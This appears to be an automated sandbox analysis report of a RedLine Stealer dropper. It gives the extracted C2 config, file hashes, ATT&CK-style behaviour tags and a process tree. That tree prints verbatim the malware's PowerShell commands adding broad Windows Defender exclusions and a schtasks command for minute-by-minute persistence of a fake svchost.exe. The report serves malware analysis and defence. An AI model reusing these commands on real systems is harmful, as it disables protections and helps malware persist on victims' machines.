Analysis
-
max time kernel
149s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09-01-2025 20:07
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$TEMP/K3M6Ljh9fd22.exe
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
$TEMP/K3M6Ljh9fd22.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
$TEMP/Selfconvened.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
$TEMP/Selfconvened.exe
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe
-
Size
4.6MB
-
MD5
d12f20d20f23819ef3448bc10873ba57
-
SHA1
961ab360fa4588bcf7494a08914a59f029d8f5e7
-
SHA256
7a5fc736a94166592a370b8b311656517e2df180917bbc61fc688eb7df0915cb
-
SHA512
392d851bda9796a3c351f5b998df90a5e0f1dc116e3ba66f73ad86d254a1d2ca1c526c3f18cd6f4ede626a1fe4001c7e30af021ada55e1adf57d3faa2f624c16
-
SSDEEP
98304:Uq8eNY5p0ExtC6RpPwVsniC5u/BDLTABEp0moOjtchoKCa:Uqup0Ex8ArMdPABEp0pAKhfCa
Malware Config
Extracted
redline
@zxckostyan4ik
95.181.152.6:46927
-
auth_value
cdf3919a262c0d6ba99116b375d7551c
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
resource yara_rule behavioral1/memory/1992-11-0x0000000000390000-0x00000000003BE000-memory.dmp family_redline behavioral1/memory/1992-18-0x0000000000390000-0x00000000003BE000-memory.dmp family_redline behavioral1/memory/1992-21-0x0000000001FC0000-0x0000000001FE0000-memory.dmp family_redline behavioral1/memory/1992-26-0x0000000000390000-0x00000000003BE000-memory.dmp family_redline -
Redline family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1492 powershell.exe 1700 powershell.exe -
Executes dropped EXE 4 IoCs
pid Process 3028 Selfconvened.exe 1992 K3M6Ljh9fd22.exe 408 svchost.exe 2100 svchost.exe -
Loads dropped DLL 3 IoCs
pid Process 2548 JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe 2548 JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe 348 taskeng.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\system32\WindowsPro\svchost.exe Selfconvened.exe File opened for modification C:\Windows\system32\WindowsPro\svchost.exe Selfconvened.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language K3M6Ljh9fd22.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 972 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 3028 Selfconvened.exe 1492 powershell.exe 1700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3028 Selfconvened.exe Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 1700 powershell.exe Token: SeDebugPrivilege 408 svchost.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 2548 wrote to memory of 3028 2548 JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe 30 PID 2548 wrote to memory of 3028 2548 JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe 30 PID 2548 wrote to memory of 3028 2548 JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe 30 PID 2548 wrote to memory of 3028 2548 JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe 30 PID 2548 wrote to memory of 1992 2548 JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe 31 PID 2548 wrote to memory of 1992 2548 JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe 31 PID 2548 wrote to memory of 1992 2548 JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe 31 PID 2548 wrote to memory of 1992 2548 JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe 31 PID 3028 wrote to memory of 1816 3028 Selfconvened.exe 34 PID 3028 wrote to memory of 1816 3028 Selfconvened.exe 34 PID 3028 wrote to memory of 1816 3028 Selfconvened.exe 34 PID 3028 wrote to memory of 972 3028 Selfconvened.exe 36 PID 3028 wrote to memory of 972 3028 Selfconvened.exe 36 PID 3028 wrote to memory of 972 3028 Selfconvened.exe 36 PID 1816 wrote to memory of 1492 1816 cmd.exe 37 PID 1816 wrote to memory of 1492 1816 cmd.exe 37 PID 1816 wrote to memory of 1492 1816 cmd.exe 37 PID 1816 wrote to memory of 1700 1816 cmd.exe 39 PID 1816 wrote to memory of 1700 1816 cmd.exe 39 PID 1816 wrote to memory of 1700 1816 cmd.exe 39 PID 348 wrote to memory of 408 348 taskeng.exe 41 PID 348 wrote to memory of 408 348 taskeng.exe 41 PID 348 wrote to memory of 408 348 taskeng.exe 41 PID 348 wrote to memory of 2100 348 taskeng.exe 42 PID 348 wrote to memory of 2100 348 taskeng.exe 42 PID 348 wrote to memory of 2100 348 taskeng.exe 42 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Users\Admin\AppData\Local\Temp\Selfconvened.exeC:\Users\Admin\AppData\Local\Temp\Selfconvened.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\system32\cmd.exe"cmd" #cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
-
C:\Windows\system32\schtasks.exe"schtasks" /create /f /sc minute /rl highest /mo 1 /tn "Bobsledding" /tr "C:\Windows\system32\WindowsPro\svchost.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:972
-
-
-
C:\Users\Admin\AppData\Local\Temp\K3M6Ljh9fd22.exeC:\Users\Admin\AppData\Local\Temp\K3M6Ljh9fd22.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1992
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {7B064C0D-52AF-4FEE-B22E-BE790C0872FC} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:348 -
C:\Windows\system32\WindowsPro\svchost.exeC:\Windows\system32\WindowsPro\svchost.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:408
-
-
C:\Windows\system32\WindowsPro\svchost.exeC:\Windows\system32\WindowsPro\svchost.exe2⤵
- Executes dropped EXE
PID:2100
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD551f6032f71042fe7316529a9c1e1bcbf
SHA166c918635e2d22864cb159858dde3c8555ee762c
SHA256716da1a746eb728537595bccf8e53864685c19f9048ccbfe266eee2f9ab64739
SHA5129e1ade1cc531c4e18c20ee2352313b3865dedf901fd4f3b246704ba98ee657c1a21d77458d74dcd7e82db8adca3d507ae98138c09fd79df39cdfac6970f4280b
-
Filesize
10.1MB
MD543d10bceb18865e16d5ba84c42f82b2c
SHA16560eaea33e3a349d20b3e6c904642ca603b416e
SHA2567ce8f82c93c4b4a32b8ab350a880ea0bf5c7bc5cd4c49360c7d9cad3efb26cfe
SHA51242cf0c5038d03f24a232277b89b750b159617cf34441976cd539cf652c10672b6ebaea3fa2b2ee9e38f26cd8fee1c0d783de10a3da153cee43468e2c530df365
-
Filesize
881KB
MD5ce5a9ec35a54e669820589d15f1faa07
SHA168a5aaa46aa2ce2c3083486f8e265e050cd421ac
SHA256a5317940f3f36d4c047ef70fcef5aedcdcdb0d9afae7ccfb3220190f09dab15b
SHA512eb097778c480b9e1bd396895ef86727997cb1c0bd1c3d6863a3d711216c2ce64d1ff647987b57c0e67b9b9673526cd28bc83aaf7177e11a9b348e2960f535131
-
Filesize
4.5MB
MD564b5e984fda860eedf19c29a124094fb
SHA1760c195741989e17b48ad52c13bed35e8ea51692
SHA2561f47c67d3baa635c4b7dd2bfed0a26a6bd499c3ab5a64d10b391a52e7d71ba39
SHA512187dbbc7137db41da77dd5c3d1471f82b157d031653109632adb9c49ea519f452b661cfd1845512661dcdb3b00bf2a02b2c3504406fb19ad89b06fcd6afee4e4